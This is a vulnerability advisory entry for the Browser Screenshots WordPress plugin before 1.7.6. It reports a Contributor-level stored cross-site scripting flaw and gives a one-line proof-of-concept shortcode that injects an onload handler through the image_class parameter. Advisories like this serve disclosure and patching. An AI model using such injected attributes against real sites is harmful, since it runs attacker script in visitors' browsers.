Browser Screenshots < 1.7.6 - Contributor+ Stored XSS

2021-06-21T00:00:00
ID WPVDB-ID:9C538C51-AE58-461D-B93B-CC9DFEBF2BC0
Type wpvulndb
Reporter apple502j
Modified 2021-06-25T07:14:20

Description

The plugin allowed authenticated users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks as the image_class parameter of the browser-shot shortcode was not escaped.

PoC

Add the following shortcode in a page, then view the page (either published or as preview to trigger the XSS): [browser-shot url="https://example.com" image_class='" onload="alert(origin)']